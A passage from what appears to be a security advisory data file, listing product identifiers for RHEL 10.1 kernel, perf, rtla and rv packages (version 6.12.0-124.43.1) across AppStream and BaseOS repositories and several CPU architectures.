"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
